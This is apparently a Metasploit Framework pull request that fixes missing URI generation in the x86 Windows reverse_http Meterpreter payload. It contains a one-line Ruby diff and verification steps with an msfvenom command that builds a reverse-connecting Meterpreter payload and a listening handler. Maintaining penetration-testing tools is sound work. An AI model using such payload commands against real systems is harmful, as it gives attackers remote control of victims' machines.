### PR TITLE
Re-add URI generation to reverse_http

### DIFF
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,6 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
+      conf[:url]        = generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']


### PR DESCRIPTION
A recent update to MSF payload generation resulted in URIs not being generated for x86 `reverse_http`. This re-adds the call to `generate_uri`, fixing the issue. It was only an issue for x86 reverse_http, the others seemed fine.

/cc @hmoore-r7 
## Verification
### Before the patch
- [x] Generate a payload using `msfvenom -p windows/meterpreter/reverse_http LHOST=<ip> LPORT=<port>`
- [x] Set up a handler.
- [x] Note that no URI is generated, and when the payload is run, the handler outputs something like `[*] 10.1.10.46:42540 Unknown request to / with UA ...`
### After the patch
- [x] Generate a new payload using the same command line
- [x] Things work as they should
